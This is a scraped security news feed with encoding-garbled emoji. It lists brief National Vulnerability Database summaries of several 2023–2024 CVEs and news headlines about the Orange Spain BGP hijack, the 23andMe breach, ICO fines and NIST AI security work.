βΌοΈCVE-2023-50867βΌοΈ
π Read more
Via "National Vulnerability Database"
Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the signupAction.php resource does not validate the characters received and they are sent unfiltered to the database. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-21625βΌοΈ
π Read more
Via "National Vulnerability Database"
SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol sidequest to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a oneclick remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly.π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2023-6551βΌοΈ
π Read more
Via "National Vulnerability Database"
As a simple library, class.upload.php does not perform an indepth check on uploaded files, allowing a stored XSS vulnerability when the default configuration is used. Developers must be aware of that fact and use extension whitelisting accompanied by forcing the server to always provide contenttype based on the file extension. The README has been updated to include these guidelines. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2023-6270βΌοΈ
π Read more
Via "National Vulnerability Database"
A flaw was found in the ATA over Ethernet AoE driver in the Linux kernel. The aoecmdcfgpkts function improperly updates the refcnt on struct netdevice, and a useafterfree can be triggered by racing between the free on the struct and the access through the skbtxq global queue. This could lead to a denial of service condition or potential code execution.π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2023-51154βΌοΈ
π Read more
Via "National Vulnerability Database"
Jizhicms v2.5 was discovered to contain an arbitrary file download vulnerability via the component admincPluginsController.php.π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2023-51812βΌοΈ
π Read more
Via "National Vulnerability Database"
Tenda AX3 v16.03.12.11 was discovered to contain a remote code execution RCE vulnerability via the list parameter at goformSetNetControlList.π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-21636βΌοΈ
π Read more
Via "National Vulnerability Database"
viewcomponent is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 have a crosssite scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the viewcomponent gem. Note that only components that define a call method i.e. instead of using a sidecar template are affected. The return value of the call method is not sanitized and can include userdefined content. In addition, the return value of the outputpostamble methodis not sanitized, which can also lead to crosssite scripting issues. Versions 3.9.0 has been released and fully mitigates both the call and the outputpostamble vulnerabilities. As a workaround, sanitize the return value of call.π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-0241βΌοΈ
π Read more
Via "National Vulnerability Database"
encodedidrails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial of service condition by sending an HTTP request with an extremely long "id" parameter. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-22047βΌοΈ
π Read more
Via "National Vulnerability Database"
A race condition exists in Audited 4.0.0 to 5.3.3 that can result in an authenticated user to cause audit log entries to be attributed to another user. π Read more
Via "National Vulnerability Database"
β€1
βΌοΈCVE-2024-22048βΌοΈ
π Read more
Via "National Vulnerability Database"
govuktechdocs versions from 2.0.2 to before 3.3.1 are vulnerable to a crosssite scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-22049βΌοΈ
π Read more
Via "National Vulnerability Database"
httparty before 0.21.0 is vulnerable to an assumedimmutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipartformdata uploads which could result in attacker controlled filenames being written. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-22050βΌοΈ
π Read more
Via "National Vulnerability Database"
Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs. π Read more
Via "National Vulnerability Database"
βΌοΈCVE-2024-22051βΌοΈ
π Read more
Via "National Vulnerability Database"
CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16MAX columns. π Read more
Via "National Vulnerability Database"
π1
ποΈ Exposed Secrets are Everywhere. Here's How to Tackle Them ποΈ
π Read
via "The Hacker News".
Picture this: you stumble upon a concealed secret within your company's source code. Instantly, a wave of panic hits as you grasp the possible consequences. This one hidden secret has the power to pave the way for unauthorized entry, data breaches, and a damaged reputation. Understanding the secret is just the beginning; swift and resolute action becomes imperative. However, lacking theπ Read
via "The Hacker News".
ποΈ Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware ποΈ
π Read
via "The Hacker News".
Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic."The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," theπ Read
via "The Hacker News".
π€―1
π 23andMe Blames User βNegligenceβ for Data Breach π
π Read
via "Infosecurity Magazine".
A 23andMe letter sent to a legal firm representing victims of the data breach claims that users were at fault for recycling passwordsπ Read
via "Infosecurity Magazine".
Infosecurity Magazine
23andMe Blames User βNegligenceβ for Data Breach
A 23andMe letter sent to a legal firm representing victims of the data breach claims that users were at fault for recycling passwords
π1
π’ Glasgow eyes goal of becoming Europeβs leading IoT city with launch of new innovation hub π’
π Read
via "ITPro".
A new facility in Glasgow will support startups operating in the smart things space π Read
via "ITPro".
ITPro
Glasgow eyes goal of becoming Europeβs leading IoT city with launch of new innovation hub
A new facility in Glasgow will support startups operating in the smart things space
π’ Intel poaches HPE exec Justin Hotard to lead its Data Center and AI Group π’
π Read
via "ITPro".
Intel CEO Pat Gelsinger said Hotard boasts an "impressive track record" in driving data center innovation π Read
via "ITPro".
ITPro
Intel poaches HPE exec Justin Hotard to lead its Data Center and AI Group
Intel CEO Pat Gelsinger said Hotard boasts an "impressive track record" in driving data center innovation
π’ ICO fines topped $14 million in 2023 amid crackdown by regulator on data protection standards π’
π Read
via "ITPro".
ICO fines across 2023 exceeded Β£14 million, with TikTok among the worst-hit for data protection violations π Read
via "ITPro".
ITPro
ICO fines topped $14 million in 2023 amid crackdown by regulator on data protection standards
ICO fines across 2023 exceeded Β£14 million, with TikTok among the worst-hit for data protection violations
π NIST Fortifies Chatbots and Self-Driving Cars Against Digital Threats π
π Read
via "Infosecurity Magazine".
This effort is the first step in NISTβs broader mission to support the development of trustworthy AIπ Read
via "Infosecurity Magazine".
Infosecurity Magazine
NIST Fortifies Chatbots and Self-Driving Cars Against Digital Threats
This effort is the first step in NISTβs broader mission to support the development of trustworthy AI
π’ Perplexity AI, a startup that just raised $73.6 million from Nvidia and Databricks, wants to take on Google's search engine dominance π’
π Read
via "ITPro".
Perplexity AI looks to position itself as a challenger to Google in the search industry, but despite rapid growth in 2023 the odds could be stacked against it π Read
via "ITPro".
ITPro
Perplexity AI, a startup that just raised $73.6 million from Nvidia and Databricks, wants to take on Google's search engine dominance
Perplexity AI looks to position itself as a challenger to Google in the search industry, but despite rapid growth in 2023 the odds could be stacked against it